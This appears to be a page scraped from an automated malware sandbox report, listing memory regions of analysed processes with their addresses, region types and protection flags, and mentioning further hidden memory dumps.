|
401000
|
unkown
|
page execute read
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2330000
|
unkown
|
page readonly
|
||
|
3ADD000
|
trusted library allocation
|
page read and write
|
||
|
291D000
|
stack
|
page read and write
|
||
|
1E28B000000
|
heap
|
page read and write
|
||
|
2951000
|
unkown
|
page execute read
|
||
|
1E286740000
|
trusted library section
|
page readonly
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
326B000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0DB47E000
|
stack
|
page read and write
|
||
|
1E286391000
|
trusted library allocation
|
page read and write
|
||
|
4EC0000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
319E000
|
unkown
|
page read and write
|
||
|
4DB9000
|
direct allocation
|
page read and write
|
||
|
2DF0000
|
unkown
|
page readonly
|
||
|
265E000
|
heap
|
page read and write
|
||
|
1E28AD80000
|
trusted library allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
28DC000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
D0DA67E000
|
unkown
|
page readonly
|
||
|
3660000
|
unkown
|
page read and write
|
||
|
23CD000
|
unkown
|
page read and write
|
||
|
4F89000
|
direct allocation
|
page read and write
|
||
|
2ED4000
|
unkown
|
page read and write
|
||
|
1E28AEB0000
|
trusted library allocation
|
page read and write
|
||
|
D0DB37E000
|
unkown
|
page readonly
|
||
|
327C000
|
heap
|
page read and write
|
||
|
1E28AEF0000
|
remote allocation
|
page read and write
|
||
|
9D7AFFE000
|
stack
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
292F000
|
unkown
|
page read and write
|
||
|
D0DBE7E000
|
unkown
|
page readonly
|
||
|
2650000
|
direct allocation
|
page read and write
|
||
|
1E28AD57000
|
trusted library allocation
|
page read and write
|
||
|
D0DABFE000
|
stack
|
page read and write
|
||
|
24D98890000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
3666000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
1E286880000
|
trusted library allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
9D7B5FE000
|
stack
|
page read and write
|
||
|
41C000
|
unkown
|
page execute read
|
||
|
49CB000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E28B051000
|
heap
|
page read and write
|
||
|
D0DB57E000
|
unkown
|
page readonly
|
||
|
3664000
|
unkown
|
page read and write
|
||
|
F1B000
|
heap
|
page read and write
|
||
|
1E285813000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26EE000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
4EB0000
|
unkown
|
page read and write
|
||
|
1E28AFC0000
|
trusted library allocation
|
page read and write
|
||
|
559F000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
1E286015000
|
heap
|
page read and write
|
||
|
E5F000
|
heap
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
326B000
|
heap
|
page read and write
|
||
|
2C78000
|
unkown
|
page readonly
|
||
|
9C000
|
stack
|
page read and write
|
||
|
5B90000
|
unkown
|
page read and write
|
||
|
1E28585B000
|
heap
|
page read and write
|
||
|
9D7B7FB000
|
stack
|
page read and write
|
||
|
417000
|
unkown
|
page write copy
|
||
|
4E2E000
|
direct allocation
|
page read and write
|
||
|
524E000
|
stack
|
page read and write
|
||
|
D0DB97D000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
413000
|
unkown
|
page readonly
|
||
|
19D000
|
stack
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
3217000
|
heap
|
page read and write
|
||
|
294D000
|
stack
|
page read and write
|
||
|
53EF000
|
stack
|
page read and write
|
||
|
91F000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
274C000
|
heap
|
page read and write
|
||
|
8A2000
|
unkown
|
page write copy
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
24D96C26000
|
heap
|
page read and write
|
||
|
31A5000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0DB27E000
|
unkown
|
page readonly
|
||
|
6FD28000
|
unkown
|
page readonly
|
||
|
31E0000
|
direct allocation
|
page read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
52EE000
|
stack
|
page read and write
|
||
|
3664000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3672000
|
unkown
|
page read and write
|
||
|
49B0000
|
heap
|
page read and write
|
||
|
D3E000
|
heap
|
page read and write
|
||
|
1E28B03F000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E8000
|
heap
|
page read and write
|
||
|
1E28B061000
|
heap
|
page read and write
|
||
|
D0DA97B000
|
stack
|
page read and write
|
||
|
6C530000
|
unkown
|
page readonly
|
||
|
2451000
|
heap
|
page read and write
|
||
|
D0DBC7E000
|
unkown
|
page readonly
|
||
|
D0DBA7E000
|
unkown
|
page readonly
|
||
|
D04000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E2858A1000
|
heap
|
page read and write
|
||
|
32EF000
|
heap
|
page read and write
|
||
|
1E286780000
|
trusted library section
|
page readonly
|
||
|
1E28B02A000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
8C8000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
40C0000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
2F1F000
|
unkown
|
page write copy
|
||
|
28BC000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
3297000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
432000
|
unkown
|
page readonly
|
||
|
1E28611A000
|
heap
|
page read and write
|
||
|
23E0000
|
direct allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E7000
|
unkown
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
327C000
|
heap
|
page read and write
|
||
|
D0DAC7E000
|
unkown
|
page readonly
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
2C82000
|
unkown
|
page write copy
|
||
|
D26000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
9D7B6FF000
|
stack
|
page read and write
|
||
|
6C565000
|
unkown
|
page read and write
|
||
|
2AB0000
|
unkown
|
page read and write
|
||
|
26E7000
|
unkown
|
page read and write
|
||
|
1E28588C000
|
heap
|
page read and write
|
||
|
2EDB000
|
unkown
|
page read and write
|
||
|
5C30000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
504D000
|
direct allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
8A2000
|
unkown
|
page read and write
|
||
|
1E2858AD000
|
heap
|
page read and write
|
||
|
35CF000
|
heap
|
page read and write
|
||
|
2ECF000
|
unkown
|
page write copy
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
3100000
|
unkown
|
page readonly
|
||
|
2A2E000
|
unkown
|
page read and write
|
||
|
32BE000
|
heap
|
page read and write
|
||
|
24D96BE6000
|
heap
|
page read and write
|
||
|
29BF000
|
stack
|
page read and write
|
||
|
1E285890000
|
heap
|
page read and write
|
||
|
1E2857D0000
|
trusted library allocation
|
page read and write
|
||
|
2EB1000
|
unkown
|
page read and write
|
||
|
24D96F15000
|
heap
|
page read and write
|
||
|
57FD000
|
direct allocation
|
page read and write
|
||
|
D0D9F7E000
|
unkown
|
page readonly
|
||
|
E60000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
3497000
|
heap
|
page read and write
|
||
|
1E28B080000
|
heap
|
page read and write
|
||
|
1E285902000
|
heap
|
page read and write
|
||
|
586E000
|
direct allocation
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2991000
|
heap
|
page read and write
|
||
|
61F000
|
heap
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
2DAB000
|
stack
|
page read and write
|
||
|
1E28ACC0000
|
trusted library allocation
|
page read and write
|
||
|
6FD31000
|
unkown
|
page read and write
|
||
|
1E28AD94000
|
trusted library allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
26E8000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
534F000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
26E7000
|
unkown
|
page read and write
|
||
|
1E286002000
|
heap
|
page read and write
|
||
|
5250000
|
unkown
|
page read and write
|
||
|
4006000
|
unkown
|
page read and write
|
||
|
1E28ADAE000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
4BB2000
|
heap
|
page read and write
|
||
|
5A61000
|
unkown
|
page read and write
|
||
|
4F20000
|
direct allocation
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0DAE7E000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2451000
|
heap
|
page read and write
|
||
|
3284000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
26E7000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
4794000
|
heap
|
page read and write
|
||
|
3291000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2B26000
|
heap
|
page read and write
|
||
|
353F000
|
unkown
|
page read and write
|
||
|
267B000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
D0DAEFE000
|
stack
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
282E000
|
stack
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
584E000
|
direct allocation
|
page read and write
|
||
|
28C9000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
3511000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E28589C000
|
heap
|
page read and write
|
||
|
D0DB77E000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
24D96F10000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
1E286102000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
57D9000
|
direct allocation
|
page read and write
|
||
|
1E2857E0000
|
trusted library section
|
page read and write
|
||
|
2ED2000
|
unkown
|
page write copy
|
||
|
4C29000
|
direct allocation
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
E1E000
|
stack
|
page read and write
|
||
|
4A8F000
|
heap
|
page read and write
|
||
|
2DE0000
|
unkown
|
page readonly
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
28CB000
|
heap
|
page read and write
|
||
|
1E285913000
|
heap
|
page read and write
|
||
|
50BE000
|
direct allocation
|
page read and write
|
||
|
FFF000
|
stack
|
page read and write
|
||
|
1E2858BA000
|
heap
|
page read and write
|
||
|
245D000
|
heap
|
page read and write
|
||
|
32AB000
|
heap
|
page read and write
|
||
|
57F9000
|
direct allocation
|
page read and write
|
||
|
2EDE000
|
unkown
|
page write copy
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
2F1A000
|
unkown
|
page write copy
|
||
|
2E8E000
|
stack
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
26D1000
|
heap
|
page read and write
|
||
|
2AC7000
|
heap
|
page read and write
|
||
|
1E28AD50000
|
trusted library allocation
|
page read and write
|
||
|
420E000
|
unkown
|
page read and write
|
||
|
103F000
|
stack
|
page read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
30FA000
|
stack
|
page read and write
|
||
|
3B4E000
|
trusted library allocation
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
238E000
|
unkown
|
page read and write
|
||
|
5235000
|
heap
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
321E000
|
heap
|
page read and write
|
||
|
2AB4000
|
unkown
|
page read and write
|
||
|
328C000
|
heap
|
page read and write
|
||
|
5BB0000
|
unkown
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
2C01000
|
unkown
|
page execute read
|
||
|
367F000
|
unkown
|
page read and write
|
||
|
31F0000
|
direct allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
5EE000
|
heap
|
page read and write
|
||
|
D0DAF7E000
|
unkown
|
page readonly
|
||
|
6FA99000
|
unkown
|
page readonly
|
||
|
E64000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
3F68000
|
unkown
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
E1E000
|
stack
|
page read and write
|
||
|
E64000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
6FA91000
|
unkown
|
page read and write
|
||
|
4027000
|
unkown
|
page read and write
|
||
|
2A7B000
|
heap
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
1E28AE20000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
D0DB07E000
|
stack
|
page read and write
|
||
|
296E000
|
stack
|
page read and write
|
||
|
6FD01000
|
unkown
|
page execute read
|
||
|
2A77000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
81E000
|
stack
|
page read and write
|
||
|
4B00000
|
direct allocation
|
page read and write
|
||
|
31A5000
|
unkown
|
page read and write
|
||
|
3201000
|
heap
|
page read and write
|
||
|
EF0000
|
heap
|
page read and write
|
||
|
2554000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0DB87E000
|
unkown
|
page readonly
|
||
|
332B000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2451000
|
heap
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
4914000
|
heap
|
page read and write
|
||
|
1E28AEA0000
|
trusted library allocation
|
page read and write
|
||
|
1E285800000
|
heap
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
26E8000
|
heap
|
page read and write
|
||
|
5A81000
|
unkown
|
page read and write
|
||
|
3AD9000
|
trusted library allocation
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
33CE000
|
heap
|
page read and write
|
||
|
3E17000
|
unkown
|
page read and write
|
||
|
23D0000
|
unkown
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
1E28AD30000
|
trusted library allocation
|
page read and write
|
||
|
3664000
|
unkown
|
page read and write
|
||
|
28C7000
|
heap
|
page read and write
|
||
|
2AB7000
|
heap
|
page read and write
|
||
|
D26000
|
heap
|
page read and write
|
||
|
2DE0000
|
unkown
|
page readonly
|
||
|
9D7B2FE000
|
stack
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
D0DA177000
|
stack
|
page read and write
|
||
|
1E285874000
|
heap
|
page read and write
|
||
|
4C9E000
|
direct allocation
|
page read and write
|
||
|
1E28586F000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
E9C000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
2F28000
|
unkown
|
page write copy
|
||
|
1E28588A000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
364E000
|
heap
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
4B59000
|
trusted library allocation
|
page read and write
|
||
|
D0DAB7E000
|
unkown
|
page readonly
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E28B075000
|
heap
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
1E286770000
|
trusted library section
|
page readonly
|
||
|
113F000
|
stack
|
page read and write
|
||
|
4000000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
26E6000
|
unkown
|
page read and write
|
||
|
35AC000
|
heap
|
page read and write
|
||
|
31A5000
|
unkown
|
page read and write
|
||
|
31A4000
|
unkown
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
2320000
|
unkown
|
page readonly
|
There are 753 hidden memdumps, click here to show them.